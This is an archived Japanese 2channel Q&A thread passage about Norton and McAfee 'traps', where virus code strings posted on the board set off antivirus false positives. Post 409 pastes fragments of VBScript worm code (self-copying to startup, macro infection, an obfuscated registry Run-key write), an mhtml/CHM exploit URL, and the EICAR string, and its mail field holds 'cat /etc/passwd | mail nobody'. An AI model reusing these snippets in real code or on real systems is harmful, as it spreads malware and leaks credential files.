[過去ログ]
ノートンがvbsウィルスのソースに誤反応3 (1002レス)
ノートンがvbsウィルスのソースに誤反応3 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/
上
下
前
次
1-
新
通常表示
512バイト分割
レス栞
このスレッドは過去ログ倉庫に格納されています。
次スレ検索
歴削→次スレ
栞削→次スレ
過去ログメニュー
409: ひよこ名無しさん [cat /etc/passwd | mail nobody] 2006/01/31(火) 10:03:47 ID:??? これかな? c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ kak.hta';ken=wd+'START End Sub <body onload=window()> http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/409
410: ひよこ名無しさん [] 2006/01/31(火) 10:08:09 ID:nkcqfLth >>408 はぁ?おめーから何も答えてもらってねーぞ。 解らねーんだったらいちいち出てくんじゃねぇよアフォ http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/410
411: ひよこ名無しさん [sage] 2006/01/31(火) 10:10:37 ID:??? 言っておくけど、回答者はどこも共通だから http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/411
412: ひよこ名無しさん [sage] 2006/01/31(火) 10:11:13 ID:??? i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!| |i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!| i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!| |i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i| i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|! |i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!| i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i |i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii| i|ii / ,,__,ニ、、 ノ( | i|i!|i| |i | Y~~/~y} `, ~ | そ、そんなー… |i !. | ,k.,.,!,.,.,r| ,! く .! i / <ニニニ'ノ \ l http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/412
413: ひよこ名無しさん [sage] 2006/01/31(火) 10:12:28 ID:??? >>410 お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/413
414: ひよこ名無しさん [sage] 2006/01/31(火) 10:16:03 ID:??? >>410 http://ansitu.xrea.jp/guidance/?Trap#It_does_not_cry ここを読んでください http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/414
415: ひよこ名無しさん [sage] 2006/01/31(火) 10:16:50 ID:??? >>410 この部分ね 2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる コードの書き込みが出回っています。 アンチウイルス(NAV)は反応しないのでファイアーウォールの 設定を見直さなければなりませんがあくまで暫定的処置です。 NIS2005の場合(多分NIS2006も同じ) http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/415
416: ひよこ名無しさん [] 2006/01/31(火) 10:16:58 ID:nkcqfLth >>411 解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/416
417: VIP@命 ◆VIPPER/vT. [] 2006/01/31(火) 10:31:48 ID:nkcqfLth あっ。ちなみにぼくは、愛新ではありません。 あしからず http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/417
418: ひよこ名無しさん [] 2006/02/01(水) 13:48:25 ID:S10H/e1R 時々ノートンインターネットセキュリティ2004を使用している際、 スレ、もしくは板そのものがサーバーに接続できなくて見ることができません。 アンチウィルスは常時つけていますが、切ってもつけていても見ることができるのですが この症状はアンチウィルスが反応している訳ではありません インターネットセキュリティをつけているときだけ見ることができないのですが なぜなんでしょうか? もちろんインターネットセキュリティの2CHに書き込める為の設定をしてあります。 これはなぜなんでしょうか? http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/418
419: ひよこ名無しさん [sage] 2006/02/01(水) 13:55:37 ID:??? >>418 >>371の問題でもないってことでしょうか。 371の暫定対処をした場合はどうなりますか? http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/419
420: 418 [] 2006/02/01(水) 14:05:32 ID:S10H/e1R >>419 ありがとうごぜーます。 呼んできます。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/420
421: ひよこ名無しさん [] 2006/02/02(木) 16:52:23 ID:KtbG8KDn ■>>1-9を読みましたか? 『YES』 マカフィーを使っているのですがdatファイルの入ったzipファイルを解凍しようと すると「Exploit-mhtresir.gen」が発見されたので削除しますと言われzipファイルの中のdatを 他の場所に保存することもdatファイルを使うことも出来ないのですがどうすれば zipファイルを解凍して中のdatファイルを使えるようになりますか? OSはXP アンチウイルスソフトはManaged virusScan plas AntiSpywareです。 お願いします。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/421
422: ひよこ名無しさん [] 2006/02/02(木) 17:55:04 ID:KtbG8KDn 他できいてみます。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/422
423: 名無しさん@お腹いぱーい。 [sage] NG NG >>421-422 > マカフィーを使っている > datファイルの入ったzipファイル 2ちゃんねるブラウザのログファイルでは無い場合はこちらのスレでは扱っていません。 このスレでは「ノートントラップ」は2ちゃんねる(掲示板)にウイルスコードが貼り付けられ Webブラウザや2ちゃんねるブラウザのログでノートンが誤反応することを指しています。 http://pc7.2ch.net/test/read.cgi/pcqa/1138826147/441 そのzipファイルがアップローダーで拾ったものならマカフィーは正常な反応を示しているかと思います。 念のためにオンラインスキャンしてみてください。 http://www.trendmicro.co.jp/hcall/index.asp マカフィーについて以降はより詳しいあなたの環境(zipファイルの出所・何のアプリケーションに使われているのか等)を書いて 以下のスレにここから誘導されたことも併記してお尋ねください。 がんばれマカフィー Part.23 / ガンバレMcAfee http://pc8.2ch.net/test/read.cgi/sec/1136576534/ もしマカフィーが2ちゃんねるブラウザのログで反応しているのならお手数ですがもう一度こちらに来てください。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/423
424: ひよこ名無しさん [] 2006/02/03(金) 09:31:43 ID:ZZST2Rw7 >>423 ご丁寧に解答を頂きありがとうございます。 datファイルの入ったzipファイルはある2ちゃんねるのスレのまとめサイト からダウンロードしたファイルです。 オンラインスキャンでは何も見つからなかったです。 >もしマカフィーが2ちゃんねるブラウザのログで反応しているのなら >お手数ですがもう一度こちらに来てください datファイルは2ちゃんねるのスレッドのdatファイルなのですが こちらでよろしいでしょうか?お願いします。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/424
425: 421 [] 2006/02/03(金) 10:12:08 ID:ZZST2Rw7 すいません>>421の者です。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/425
426: 名無しさん@お腹いぱーい。 [sage] NG NG >>424-425 おそらくそれはウイルスコードにマカフィーが誤反応しているものだと思われます。 他で教えていただいたのですがマカフィーにはノートンのようなウイルススキャンでフォルダ・ファイルの除外項目が無いそうです。 以下、現在の状況での対処方法です。 2ちゃんねるブラウザのJane派生のJaneViewでWickedStr.txtに手動で反応する文字列の一部を追記する。 誤反応スクリプト無効化ソフトttp://www.geocities.jp/cen_hp/program3.htmlのアップデートを待って(現在マカフィートラップには対応していません) ActiveShieldを無効→対象スレを取得→「誤反応スクリプト無効化ソフト」を使ってウイルスコードを無効→ActiveShield有効 2ちゃんねるブラウザMonoViewのアップデートを待って(現在マカフィートラップには対応していません)読み込む。 一番いい方法はマカフィーに該当するdatファイルを送って対策を促すことだと思います。 マカフィーユーザーで既に対処の仕方を知っている方がいらっしゃるのかもしれませんので >>423のマカフィーのスレでこちらのことを聞いてみていただけませんでしょうか。 対処方法がありましたらこちらのスレにもお知らせいただけると幸いです。 また参考のためにも今後もこちらに来ていただけると助かります。 ノートントラップとマカフィートラップのウイルスコードは違うようなので ノートンでは反応しないでマカフィーが誤反応したりまたその逆もあります。 長々としましたがマカフィートラップについての決定打が見当たらないので手探りのレスを御許しください。 参考にマカフィートラップと思われるやり取りの過去ログです。 http://pc5.2ch.net/test/read.cgi/sec/1106492538/72-77+553-555+558-559+563 ttp://makimo.to:8000/2ch/pc5_sec/1106/1106492538.html http://qb5.2ch.net/test/read.cgi/saku/1097313582/62-65n ttp://jbbs.livedoor.jp/bbs/read.cgi/computer/10301/1071925088/373-378 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/426
427: 421 [] 2006/02/03(金) 14:40:06 ID:ZZST2Rw7 >>426 わかりやすく説明していただき、 関連スレまで貼っていただいてありがとうございます。 ただ解決まではいけなかったので>>423の方で聞かせて頂きます。 何かわかりましたらこちらにも報告させて頂きますね。 ありがとうございました。 http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/427
428: ひよこ名無しさん [sage] 2006/02/06(月) 19:42:50 ID:??? なんかjaneでこのスレ読むとレス番がずれまくりなんですけど これ直す方法はないんでしょうか…?何度再読み込みしても 421さんが406さんになっちゃいます…↓ > 406 名前:421[] 投稿日:2006/02/03(金) 14:40:06 ID:ZZST2Rw7 logフォルダの除外設定はしてあるので、先生も怒ってないんですが… ノートン2004でxp。専ブラはjaneDoeView α051128です http://medaka.5ch.net/test/read.cgi/pcqa/1109609938/428
上
下
前
次
1-
新
書
関
写
板
覧
索
設
栞
歴
あと 574 レスあります
スレ情報
赤レス抽出
画像レス抽出
歴の未読スレ
AAサムネイル
Google検索
Wikipedia
ぬこの手
ぬこTOP
0.008s